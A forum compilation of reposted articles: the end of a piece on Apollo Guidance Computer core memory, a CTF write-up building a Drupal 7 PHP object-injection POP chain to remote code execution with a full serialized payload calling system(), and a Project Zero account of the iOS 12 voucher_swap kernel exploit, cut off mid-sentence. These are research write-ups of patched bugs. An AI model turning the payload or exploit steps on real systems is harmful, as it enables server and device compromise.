regulation is in the middle and right of the module. On top of the module (front in the photo) you can see the horizontal lines of the nickel ribbon that connects the circuits; it is somewhat similar to a printed circuit board. Sense amplifier module with top removed. Note the nickel ribbon interconnect at the top of the module. The photo below shows a closeup of the module. At the top are two amplifier integrated circuits in metal cans. Below are two reddish pulse transformers. An output driver transistor is between the pulse transformers.15 The resistors and capacitors are mounted using cordwood construction, so one end of the component is wired on this side of the module, and one on the other side. Note the row of connections at the top of the module; these connect to the nickel ribbon interconnect. Closeup of the sense amplifier module for the AGC. The sense amplifier integrated circuits are at the top and the reddish pulse transformers are below. The pins are at the bottom and the wires at the top go to the nickel ribbon, which is like a printed circuit board. The diagram below shows the circuitry inside each sense amp integrated circuit. The sense amp chip is considerably more complex than the NOR gate IC. The chip receives the sense amp signal inputs from the pulse transformer and the differential amplifier amplifies the signal.16 If the signal exceeds a threshold, the IC outputs a 1 bit when clocked by the strobe. Circuitry inside the sense amp integrated circuit for the AGC. Writes With core memory, the read operation and write operation are always done in pairs. Since a word is erased when it is read, it must then be written, either with the original value or a new value. In the write cycle, the X and Y select lines are energized to flip the core to 1, using the opposite current from the read cycle. Since the same X and Y select lines go through all the planes, all bits in the word would be set to 1. To store a 0 bit, each plane has an inhibit line that goes through all the cores in the plane. Energizing the inhibit line in the opposite direction to the X and Y select lines partially cancels out the current and prevents the core from receiving enough current to flip it, so the bit remains 0. Thus, by energizing the appropriate inhibit lines, any value can be written to the word in core. The 16 inhibit lines are driven by the Erasable Driver modules. The broken wire During the restoration, we tested the continuity of all the lines through the core module. Unfortunately, we discovered that the inhibit line for bit 16 is broken internally. NASA discovered in early testing that wires could be sheared inside the module, due to vibrations between the silicone encapsulation and the epoxy encapsulation. They fixed this problem in the later modules that were flown, but our module had the original faulty design. We attempted to find the location of the broken wire with X-rays, but couldn't spot the break. Time-domain reflectometry suggests the break is inconveniently located in the middle of the core planes. We are currently investigating options to deal with this. Marc has a series of AGC videos; the video below provides detail on the broken wire in the memory module. Conclusion Core memory was the best storage technology in the 1960s and the Apollo Guidance Computer used it to get to the Moon. In addition to the core memory module itself, the AGC required several modules of supporting circuitry. The AGC's logic circuits used early NOR-gate integrated circuits, while the analog circuits were built from discrete components and sense amplifier ICs using cordwood construction. The erasable core memory in the AGC stored just 2K words. Because each bit in core memory required a separate physical ferrite core, density was limited. Once semiconductor memory became practical in the 1970s, it rapidly replaced core memory. The image below shows the amazing density difference between semiconductor memory and core memory: 64 bits of core take about the same space as 64 gigabytes of flash. Core memory from the IBM 1401 compared with modern flash memory. I announce my latest blog posts on Twitter, so follow me @kenshirriff for future articles. I also have an RSS feed. See the footnotes for Apollo manuals17 and more information sources18. Thanks to Mike Stewart for supplying images and extensive information. Notes and references The AGC restoration team consists of Mike Stewart (creator of FPGA AGC), Carl Claunch, Marc Verdiell (CuriousMarc) on YouTube and myself. The AGC that we're restoring belongs to a private owner who picked it up at a scrap yard in the 1970s after NASA scrapped it. For simplicity I refer to the AGC we're restoring as "our AGC". The Apollo flights had one AGC in the command module (the capsule that returned to Earth) and one AGC in the lunar module. In 1968, before the Moon missions, NASA tested a lunar module (with astronauts aboard) in a giant vacuum chamber in Houston to ensure that everything worked in space-like conditions. We believe our AGC was installed in that lunar module (LTA-8). Since this AGC was never flown, most of the modules are not potted with epoxy. ↩ We don't have core rope modules, but we have a core rope simulator from the 1970s. Yes, we know about Francois; those are ropes for the earlier Block I Apollo Guidance Computer and are not compatible with our Block II AGC. ↩ Many people have asked if we talked to Fran about the DSKY. Yes, we have. ↩ There were alternative ways to wire a core plane. Using a diagonal sense wire reduced the noise in the sense wire from X and Y pulses but some used a horizontal sense wire. Some core systems used the same wire for sense and inhibit (which simplified manufacturing), but that made noise rejection more complex. ↩ If you look carefully at the pictures of modules installed in the AGC, the Erasable Driver module in B10 is upside down. This is not a mistake, but how the system was designed. I assume this simplified the backplane wiring somehow, but it looks very strange. ↩ The IBM 1401 business computer, for example, used a different approach to generate the X and Y select lines. To generate the 50 X select signals, it used a 5×10 matrix of cores (separate from the actual memory cores). Two signals into the matrix were energized at the same time, flipping one of the 50 cores and generating a pulse on that line. Thus, only 5+10 drivers were needed instead of 50. The Y select signals were similar, using an 8×10 matrix. Details here. ↩ The AGC core memory required 192 diodes to prevent sneak paths, where a pulse could go backward through the wrong select lines. Each line required two diodes since the lines are driven one direction for read and the opposite for write. Since there are 64 X lines and 32 Y lines, 2×(64+32) = 192 diodes were required. These diodes were installed in two layers in the top of the core memory module. ↩ The memory address is mapped onto the select lines as follows. The eight X bottom signals are generated from the lowest address bits, S01, S02 and S03. (Bits in a word are numbered starting at 1, not 0.) Each decoder output has as NOR gate to select a particular bit pattern, along with four more NOR gates as buffers. The eight X top signals are generated from address bits S04, S05, and S06. The four Y bottom signals are generated from address bits S07 and S08. The eight Y top signals are generated from address bits EAD09, EAD10, and EAD11; these in turn were generated from S09 and S10 along with bank select bits EB9, EB10 and EB11. (The AGC used 12-bit addresses, allowing 4096 words to be addressed directly. Since the AGC had 38K of memory in total, it had a complex memory bank system to access the larger memory space.) ↩ For address decoding, the X drivers were in module A14, the Y top drivers were in A7 and the Y bottom drivers in A14. The memory address was held in the memory address register (S register) in module A12, which also held a bit of decoding logic. Module A14 also held some memory timing logic. In general, the AGC's logic circuits weren't cleanly partitioned across modules since making everything fit was more important than a nice design. ↩ One unusual thing to notice about the AGC's logic circuitry is there are no bypass capacitors. Most integrated circuit logic has a bypass capacitor next to each IC to reduce noise, but NASA found that the AGC worked better without bypass capacitors. ↩ The "Blue-nose" gate doesn't have the pull-up resistor connected, making it open collector. It is presumably named after its blue appearance on blueprints. Blue-nose outputs can be connected together to form a NOR gate with more inputs. In the case of the address decoder, the internal pull-up resistor is not used so the Erasable Driver module (B9/B10) can pull the signal up to BPLUS (+14V) rather than the +4V logic level. ↩ The AGC project used integrated circuits from multiple suppliers, so die photos from different sources show different layouts. ↩ The memory cores and the switching core were physically very different. The cores in the memory module had a radius between 0.047 and 0.051 inches (about 1.2mm). The switching cores were much larger (either .249" or .187" depending on the part number) and had 20 to 50 turns of wire through them. ↩ For some reason, the inputs to the current switches are numbered starting at 0 (XT0E-XT7E) while the outputs are numbered starting at 1 (1AXBF-8AXBF). Just in case you try to understand the schematics. ↩ The output from the sense amplifiers is a bit confusing because the erasable core memory (RAM) and fixed rope core memory (ROM) outputs are wired together. The RAM has one sense amp module with 16 amplifiers in slot B13, and the ROM has its own identical sense amp module in slot B14. However, each module only has 8 output transistors. The two modules are wired together so 8 output bits are driven by transistors in the RAM's sense amp module and 8 output bits are driven by transistors in the ROM's sense amp module. (The motivation behind this is to use identical sense amp modules for RAM and ROM, but only needing 16 output transistors in total. Thus, the transistors are split up 8 to a module.) ↩ I'll give a bit more detail on the sense amps here. The key challenge with the sense amps is that the signal from a flipping core is small and there are multiple sources of noise that the sense line can pick up. By using a differential signal (i.e. looking at the difference between the two inputs), noise that is picked up by both ends of the sense line (common-mode noise) can be rejected. The differential transformer improved the common-mode noise rejection by a factor of 30. (See page 9-16 of the Design Review.) The other factor is that the sense line goes through some cores in the same direction as the select lines, and through some cores the opposite direction. This helps cancel out noise from the select lines. However, the consequence is that the pulse on the sense line may be positive or may be negative. Thus, the sense amp needed to handle pulses of either polarity; the threshold stage converted the bipolar signal to a binary output. ↩ The Apollo manuals provide detailed information on the memory system. The manual has a block diagram of the AGC's memory system. The address decoder is discussed in the manual starting at 4-416 and schematics are here. Schematics of the Erasable Driver modules are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Schematics of the Current Switch module are here and here; the circuit is discussed in section 4-5.8.3.3 of the manual. Sense amplifiers are discussed in section 4-5.8.3.4 of the manual with schematics here and here; schematics are here and here. ↩ For more information on the AGC, the Virtual AGC site has tons of information on the AGC, in particular the ElectroMechanical page has lots of schematics and drawings. There's a video of Eldon Hall, designer of the AGC, disassembling our AGC in 2004. If you want to try a simulated AGC in your browser, see moonjs. Eldon Hall's book Journey to the Moon: The History of the Apollo Guidance Computer is very interesting. Also see Sunburst and Luminary: An Apollo Memoir by Don Eyles, who wrote a lot of the lunar landing code and discusses the famous program alarms. The Apollo Guidance Computer: Architecture and Operation is unevenly written and has errors, but the discussion in the last half of space navigation and a lunar mission is informative. ↩ Sursa: http://www.righto.com/2019/01/inside-apollo-guidance-computers-core.html
  5. CTF Writeup: Complex Drupal POP Chain 29 Jan 2019 by Simon Scannell A recent Capture-The-Flag tournament hosted by Insomni’hack challenged participants to craft an attack payload for Drupal 7. This blog post will demonstrate our solution for a PHP Object Injection with a complex POP gadget chain. About the Challenge The Droops challenge consisted of a website which had a modified version of Drupal 7.63 installed. The creators of the challenge added a Cookie to the Drupal installation that contained a PHP serialized string, which would then be unserialized on the remote server, leading to a PHP Object Injection vulnerability. Finding the cookie was straightforward and the challenge was obvious: Finding and crafting a POP chain for Drupal. If you are not familiar with PHP Object Injections we recommend reading our blog post about the basics of PHP Object Injections. Drupal POP Chain to Drupalgeddon 2 We found the following POP chain in the Drupal source code that affects its cache mechanism. Through the POP chain it was possible to inject into the Drupal cache and abuse the same feature that lead to the Drupalgeddon 2 vulnerability. No knowledge of this vulnerability is required to read this blog post, as each relevant step will be explained. The POP chain is a second-order Remote Code Execution, which means that it consists of two steps: Injecting into the database cache the rendering engine uses Exploiting the rendering engine and Drupalgeddon 2 Injecting into the cache The DrupalCacheArray class in includes/bootstrap.inc implements a destructor and writes some data to the database cache with the method set(). This is our entry point of our gadget chain. 1 2 3 4 5 6 7 8 91011121314 /** * Destructs the DrupalCacheArray object. */ public function __destruct() { $data = array(); foreach ($this->keysToPersist as $offset => $persist) { if ($persist) { $data[$offset] = $this->storage[$offset]; } } if (!empty($data)) { $this->set($data); } } The set() method will essentially call Drupal’s cache_set() function with $this->cid, $data, and $this->bin, which are all under control of the attacker since they are properties of the injected object. We assumed that we are now able to inject arbitrary data into the Drupal cache. 1 2 3 4 5 6 7 8 91011121314 protected function set($data, $lock = TRUE) { // Lock cache writes to help avoid stampedes. // To implement locking for cache misses, override __construct(). $lock_name = $this->cid . ':' . $this->bin; if (!$lock || lock_acquire($lock_name)) { if ($cached = cache_get($this->cid, $this->bin)) { $data = $cached->data + $data; } cache_set($this->cid, $data, $this->bin); if ($lock) { lock_release($lock_name); } } } In order to find out if this assumption was true, we started digging into the internals of the Drupal cache. We found out that the cache entries are stored in the database. Each cache type has its own table. (A cache for forms, one for pages and so on.) 1 2 3 4 5 6 7 8 910111213141516 MariaDB [drupal7]> SHOW TABLES; +-----------------------------+ | Tables_in_drupal7 | +-----------------------------+ ... | cache | | cache_block | | cache_bootstrap | | cache_field | | cache_filter | | cache_form | | cache_image | | cache_menu | | cache_page | | cache_path | ... After a bit more of digging around, we discovered that the table name is the equivalent to $this->bin. This means we can set bin to be of any cache type and inject into any cache table. But what can we do with this? The next step was to analyze the different cache tables for interesting entries and their structure. 1 2 3 4 5 6 7 8 910 MariaDB [drupal7]> DESC cache_form; +------------+--------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +------------+--------------+------+-----+---------+-------+ | cid | varchar(255) | NO | PRI | | | | data | longblob | YES | | NULL | | | expire | int(11) | NO | MUL | 0 | | | created | int(11) | NO | | 0 | | | serialized | smallint(6) | NO | | 0 | | +------------+--------------+------+-----+---------+-------+ For example the cache_form table has a column called cid. As a reminder, one of the arguments to cache_set() was $this->cid. We assumed the following: $this->cid maps to the cid column of the cache table, which is set in $this->bin. cid is the key of a cache entry and the data column simply is the $data parameter in cache_set(). To verify all these assumptions we created a serialized payload locally by creating a class in a build.php file and unserialized it on my test Drupal setup: 1 2 3 4 5 6 7 8 910111213 class SchemaCache { // Insert an entry with some cache_key protected $cid = "some_cache_key"; // Insert it into the cache_form table protected $bin = "cache_form"; protected $keysToPersist = array('input_data' => true); protected $storage = array('input_data' => array("arbitrary data!")); } $schema = new SchemaCache(); echo serialize($schema); The reason we used the SchemaCache class here is because it extends the abstract class DrupalCacheArray, which means it can’t be instantiated on its own. The deserialization of this data lead to the following entry in the cache_form table being created: 123456 MariaDB [drupal7]> SELECT * FROM cache_form; +----------------+-----------------------------------------------------------+--------+------------+------------+ | cid | data | expire | created | serialized | +----------------+-----------------------------------------------------------+--------+------------+------------+ | some_cache_key | a:1:{s:10:"input_data";a:1:{i:0;s:15:"arbitrary data!";}} | 0 | 1548684864 | 1 | +----------------+-----------------------------------------------------------+--------+------------+------------+ Using the injected cached data to gain Remote Code Execution Since we were now able to inject arbitrary data into any caching table, we started to search for ways in which the cache was used by Drupal that could be used to gain Remote Code Execution. After a bit of searching, we stumbled upon the following ajax callback, which can be triggered by making a request to the URL: http://drupalurl.org/?q=system/ajax. 1234 function ajax_form_callback() { list($form, $form_state, $form_id, $form_build_id, $commands) = ajax_get_form(); drupal_process_form($form['#form_id'], $form, $form_state); } The ajax_get_form() function internally uses cache_get() to retrieve a cached entry from the cache_form table: 12345 if ($cached = cache_get('form_' . $form_build_id, 'cache_form')) { $form = $cached->data; ... return $form; } This is interesting because this means it is possible to pass an arbitrary form render array to drupal_process_form(). As previously mentioned, the Drupalgeddon 2 vulnerability abused this feature, so chances were high that code execution could be achieved with the ability to inject arbitrary render arrays into the rendering engine. Within drupal_process_form(), we found the following lines of code: 1234 if (isset($element['#process']) && !$element['#processed']) { foreach ($element['#process'] as $process) { $element = $process($element, $form_state, $form_state['complete form']); } Here, $element refers to the $form received via cache_get(), meaning the keys and values of the array can be set arbitrarily. This means it is possible to simply set an arbitrary process (#process) callback and execute it with the render array as a parameter. Since the first argument is an array, it is not possible to simply call a function such as system() directly. What is required is a function that takes an array as input that leads to RCE. The drupal_process_attached() function seemed very promising: 1 2 3 4 5 6 7 8 91011 function drupal_process_attached($elements, $group = JS_DEFAULT, $dependency_check = FALSE, $every_page = NULL) { ... foreach ($elements['#attached'] as $callback => $options) { if (function_exists($callback)) { foreach ($elements['#attached'][$callback] as $args) { call_user_func_array($callback, $args); } } } return $success; Since all array keys and values can be set arbitrarily, is is possible to call an arbitrary function with arbitrary arguments via call_user_func_array(), which leads to RCE! This means the final POP chain looks like this: 1 2 3 4 5 6 7 8 9101112131415161718192021222324252627 <?php class SchemaCache { // Insert an entry with some cache_key protected $cid = "form_1337"; // Insert it into the cache_form table protected $bin = "cache_form"; protected $keysToPersist = array( '#form_id' => true, '#process' => true, '#attached' => true ); protected $storage = array( '#form_id' => 1337, '#process' => array('drupal_process_attached'), '#attached' => array( 'system' => array(array('sleep 20')) ) ); } $schema = new SchemaCache(); echo serialize($schema); All that is left to do is to trigger the PHP Object Injection vulnerability with the resulting serialized string and then to make a POST request to http://drupalurl.org/?q=system/ajax and set the POST parameter form_build_id to 1337 to trigger the RCE. Conclusion POP chains can often become more complex and require a deeper knowledge of the application. However, the purpose of this blog post was to demonstrate that exploitation is still possible, even if no obvious, first order POP chain exists. If we had not known that the rendering API of drupal uses a lot of callbacks and had vulnerabilities in the past, we probably would not have found this particular POP chain. Alternatively, deep PHP knowledge can also lead to working POP chains when no obvious POP chain can be found. There exists another POP chain, an Object Instantion to Blind XXE to File Read to SQL Injection to RCE. A write up for this POP chain was written by Paul Axe and can be found here. We also would like to thank the creators for creating this and the other amazing challenges for the Insomni’hack CTF 2019. Tags: simon scannell, php, writeup, php object injection, Author: Simon Scannell Security Researcher Simon is a self taught security researcher at RIPS Technologies and is passionate about web application security and coming up with new ways to find and exploit vulnerabilities. He currently focuses on the analysis of popular content management systems and their security architecture. Sursa: https://blog.ripstech.com/2019/complex-drupal-pop-chain/
  6. Tuesday, January 29, 2019 voucher_swap: Exploiting MIG reference counting in iOS 12 Posted by Brandon Azad, Project Zero In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS. A curious discovery MIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new: for example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2. Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows: If a MIG service routine returns success, then it took ownership of all resources passed in. If a MIG service routine returns failure, then it took ownership of none of the resources passed in. Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs. The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics. Here's the relevant code from _Xsemaphore_destroy(): task = convert_port_to_task(In0P->Head.msgh_request_port); OutP->RetCode = semaphore_destroy(task, convert_port_to_semaphore(In0P->semaphore.name)); task_deallocate(task); #if __MigKernelSpecificCode if (OutP->RetCode != KERN_SUCCESS) { MIG_RETURN_ERROR(OutP, OutP->RetCode); } if (IP_VALID((ipc_port_t)In0P->semaphore.name)) ipc_port_release_send((ipc_port_t)In0P->semaphore.name); #endif /* __MigKernelSpecificCode */ The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy(): On success, semaphore_destroy() should consume the semaphore reference. On failure, semaphore_destroy() should still consume the semaphore reference. Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure. This of course begs the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules? A bad swap Not long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher(). This is the MIG definition from osfmk/mach/task.defs: routine task_swap_mach_voucher( task : task_t; new_voucher : ipc_voucher_t; inout old_voucher : ipc_voucher_t); And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper: mig_internal novalue _Xtask_swap_mach_voucher (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP) { ... kern_return_t RetCode; task_t task; ipc_voucher_t new_voucher; ipc_voucher_t old_voucher; ... task = convert_port_to_task(In0P->Head.msgh_request_port); new_voucher = convert_port_to_voucher(In0P->new_voucher.name); old_voucher = convert_port_to_voucher(In0P->old_voucher.name); RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher); ipc_voucher_release(new_voucher); task_deallocate(task); if (RetCode != KERN_SUCCESS) { MIG_RETURN_ERROR(OutP, RetCode); } ... if (IP_VALID((ipc_port_t)In0P->old_voucher.name)) ipc_port_release_send((ipc_port_t)In0P->old_voucher.name); if (IP_VALID((ipc_port_t)In0P->new_voucher.name)) ipc_port_release_send((ipc_port_t)In0P->new_voucher.name); ... OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher); OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX; OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply)); OutP->msgh_body.msgh_descriptor_count = 1; } Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher(): task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed. task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume. On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object. On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port(). With these semantics in mind, we can compare against the actual implementation. Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation: kern_return_t task_swap_mach_voucher( task_t task, ipc_voucher_t new_voucher, ipc_voucher_t *in_out_old_voucher) { if (TASK_NULL == task) return KERN_INVALID_TASK; *in_out_old_voucher = new_voucher; return KERN_SUCCESS; } This implementation does not respect the intended semantics: The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference. The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own. Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count. (Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.) On vouchers In order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation. Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition: /* * IPC Voucher * * Vouchers are a reference counted immutable (once-created) set of * indexes to particular resource manager attribute values * (which themselves are reference counted). */ struct ipc_voucher { iv_index_t iv_hash; /* checksum hash */ iv_index_t iv_sum; /* checksum of values */ os_refcnt_t iv_refs; /* reference count */ iv_index_t iv_table_size; /* size of the voucher table */ iv_index_t iv_inline_table[IV_ENTRIES_INLINE]; iv_entry_t iv_table; /* table of voucher attr entries */ ipc_port_t iv_port; /* port representing the voucher */ queue_chain_t iv_hash_link; /* link on hash chain */ }; As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library. The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit. As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic. iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL. In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one. That's out of line! There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers. Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed. But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless. Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field. Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher. Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object. In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid. But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace. This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers. Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want. Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic. The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer. This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot. This gives us our working strategy to exploit this bug: Allocate a page of Mach vouchers. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability. Deallocate the voucher ports, freeing all the vouchers. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port. Pipe dreams So what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port. Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers. Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead. At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors. tfp0 Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic. We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point. We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory. An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages. In order to get the address of the pipe buffer we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer. At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory. And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code. Bug collision I reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a which fixed the issue. Since this would be an incredibly quick turnaround for Apple, I suspected that this bug was found and reported by some other party first. I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. SorryMybad used this vulnerability as part of a remote jailbreak 